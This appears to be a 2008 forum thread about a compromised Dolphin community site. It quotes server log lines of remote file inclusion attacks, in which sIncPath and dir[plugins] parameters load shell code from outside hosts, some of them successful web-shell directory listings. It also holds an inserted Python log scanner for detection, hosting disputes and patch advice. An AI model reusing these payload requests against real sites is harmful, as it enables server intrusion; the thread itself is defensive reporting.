Security issue!!!!!!

bambie posted 27th of October 2008 in Community Voice. 12 comments.
Your /ray directory is being heavily exploited. I've removed quite a few pieces of malware from this directory.


[root@storm /home/******/public_html/ray/modules]# ll
-rw-r--r--   1  141323 Oct 24 10:33 bra.tar.gz
-rw-r--r--   1    5680 Oct 25 00:16 help.php
-rw-r--r--   1     621 Oct 21 04:36 ips.txt
-rw-------   1  148749 Oct 20 21:33 login.php
-rw-r--r--   1    8219 Oct 21 02:00 mm.php
-rw-r--r--   1      39 Oct 25 00:18 rm.txt
-rwxr-xr-x   1   40375 Oct 25 00:17 rxc.txt
-rw-------   1    5505 Oct 20 21:29 sun.php
211.214.161.239 /articles/entry/New-Games//?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
211.214.161.239 /articles/entry//?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
211.214.161.239 //?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
211.214.161.239 //?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
116.126.143.88 /deep//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ggdo.com/zboard/jem/id2.txt?? 503
116.126.143.88 //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ggdo.com/zboard/jem/id2.txt?? 503
116.126.143.88 //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ggdo.com/zboard/jem/id2.txt?? 503
116.126.143.88 /deep//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ggdo.com/zboard/jem/id2.txt?? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
91.197.231.29 //?sIncPath=http://gosgo.com/bbs/idxx.txt?????? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
91.197.231.29 //?sIncPath=http://gosgo.com/bbs/idxx.txt?????? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
86.128.225.220 /member.php?action=show_login_form&relocate=http%3A%2F%2Fwww.profileconnexions.co.cc%2F 200
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 200
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 200
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
140.130.101.5 /contact.php//?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
140.130.101.5 /contact.php//?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 200
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 302
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
140.130.101.5 /%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 200
140.130.101.5 /%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 404
140.130.101.5 /%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 404
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 302
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
140.130.101.5 /%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
202.142.223.158 //?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
202.142.223.158 /deep//?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
203.146.15.54 /index.php?classifieds_mode=rand//plugins/safehtml/safehtml.php?dir[plugins]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? 503
203.146.15.54 //plugins/safehtml/safehtml.php?dir[plugins]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? 503
195.3.194.35 /about_us.php//?sIncPath=http://www.newminiclub.nl/copyright.txt?? 503

 
Comments
bambie
[root@storm /home/*******/www/ray/modules]# user=*******;awk '{print $1,$7,$9}' /usr/local/apache/domlogs/$user/*|grep -iE "http|ftp|union|select|concat"|grep 200|grep -v member
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2F&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2F&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a 200
[root@storm /home/*******/www/ray/modules]#



All successful hack attempts.
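A defender-side rendition of the awk/grep filter above, added here as an example and not part of the thread: it reads lines in the same three-field shape the command prints, percent-decodes every query parameter, flags any parameter whose value is an absolute http/ftp URL (as sIncPath and dir[plugins] are in the entries above), and separates attempts the server refused (503) from those that returned 200. The sample lines, hosts and paths are constructed, and the `relocate` allowlist stands in for the thread's `grep -v member`.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample in the "client path status" shape the thread prints with
# awk '{print $1,$7,$9}'. Hosts and paths are made up for this example.
SAMPLE_LOG = """\
203.0.113.10 //?sIncPath=http://example.invalid/bbs/idd.txt? 503
203.0.113.10 //?sIncPath=http://example.invalid/bbs/idfeel.txt%0D? 200
198.51.100.7 //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://example.invalid/id2.txt?? 503
198.51.100.7 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fexample.invalid%2Fposts.txt%3F&act=ls&d=%2Fhome%2Fuser%2Fpublic_html%2Fray%2Fmodules%2Fim%2F&sort=0a 200
192.0.2.44 /member.php?action=show_login_form&relocate=http%3A%2F%2Fwww.example.invalid%2F 200
192.0.2.45 /index.php?page=about 200
"""

# A parameter value that starts with a URL scheme is a remote file inclusion attempt.
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# Parameters that legitimately carry an absolute URL (what the thread's grep -v member skips).
REDIRECT_PARAMS = {"relocate"}

def parse_line(line):
    """Split one reduced log line into (client, request path, status code)."""
    client, path, status = line.split()
    return client, path, int(status)

def remote_include_params(path):
    """Return (name, value) pairs whose decoded value is an absolute remote URL."""
    _, _, query = path.partition("?")  # everything after the first '?'
    # parse_qsl percent-decodes names and values, so http%3A%2F%2F is caught as well
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if name not in REDIRECT_PARAMS and REMOTE_URL.match(value)]

def scan(log_text):
    """One finding per line that carries a remote URL in an include-style parameter."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, path, status = parse_line(line)
        hits = remote_include_params(path)
        if hits:
            name, url = hits[0]
            # 503 here is the server refusing the request; 200 means the include ran
            findings.append({"client": client, "param": name, "url": url, "status": status,
                             "outcome": "succeeded" if status == 200 else "blocked"})
    return findings

def successful_clients(log_text):
    """Clients whose inclusion attempt returned 200: the hosts to block and investigate first."""
    return sorted({f["client"] for f in scan(log_text) if f["outcome"] == "succeeded"})
```

Run it over the real domlogs by feeding the awk output in place of SAMPLE_LOG; a 200 next to a decoded remote URL is the line that matters, not the 503s.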
buckmcgoo
You always amaze me because you have spammed your hosting link all over expertzzz and here.. which I would guess is a reseller account. Then you post stuff like this to show everyone that you don't really know anything about hosting??
bambie
Please do not make statements without knowing the facts.
buckmcgoo
I won't.. but the one above is correct.
sammie
Well, he sells hosting with register_globals On and can't read the minimum requirements or even protect his own site. Makes you wonder, huh?
bambie
Out of all the scripts that run on my server none get hacked apart from Boonex scripts. We also host for OSDate and never in 5 years has a site on my server running OSDate been hacked.
buckmcgoo
Yeah but that is because your hosting has only been around 2 months.
bambie
Everything is fine on the server end. I have had a security company investigate this and they say it's an exploit in the script. My server is fully protected.

Also my site is hosted on a completely different server to my hosting.

And a member of staff has confirmed that the holes in the script are fixed.
deepesh
I am having the same security problem on my site.. can you fix this...
This is what I got in my email..

We have suspended your account due to an emergency situation we had with the box, it triggered our firewall, and due to the malicious scripts your website was running, we had to immediately suspend it to avoid any further downtime for other customers on the box.

This is all we could gather of what was running, we couldn't find from where in your script it was running, just it was launching malicious code that is affecting the server.

meromate 30130 0.0 0.0 0 0 ? ZN 17:20 0:00 [sh]
meromate 30131 0.0 0.0 0 0 ? ZN 17:20 0:00 [sh]
meromate 30150 15.7 0.0 5656 3736 ? SN 17:20 3:20 html
meromate 30167 37.2 0.0 5648 3752 ? SN 17:20 7:54 html

5756 meromate 19 4 7404 5720 1428 S 0 0.1 0:00.23 perl
5758 meromate 21 4 7196 5488 1428 S 0 0.1 0:00.22 perl
5767 meromate 21 4 7156 5424 1476 S 0 0.1 0:00.24 perl
7204 meromate 21 4 8192 6500 1480 S 0 0.2 0:00.13 perl
7206 meromate 21 4 7568 5816 1428 S 0 0.1 0:00.23 perl

can you fix this.. please write me
praveenkv1988
You should turn register globals off. This was already discussed. Also the dolphin 6.1.3 patch fixed some of these type of attacks.
starrfire
Being new here I'm not privy to the members, but the exploits shown in the 3 posts appear legit. Although, I have my register globals set to off. Some hosting companies such as hostgator (which is the #1 featured hosting company shown on this site) have register globals on, but it can be changed in the cpanel via the Software/Services area > php.ini Quick Config.

If the globals are set to off and this is still taking place then there likely is a vulnerability somewhere in the script, although I'm not sure which version you're using. I'm testing the 6.1.5 and it seems stable but I've just started on it, so far, so good :-)
 
 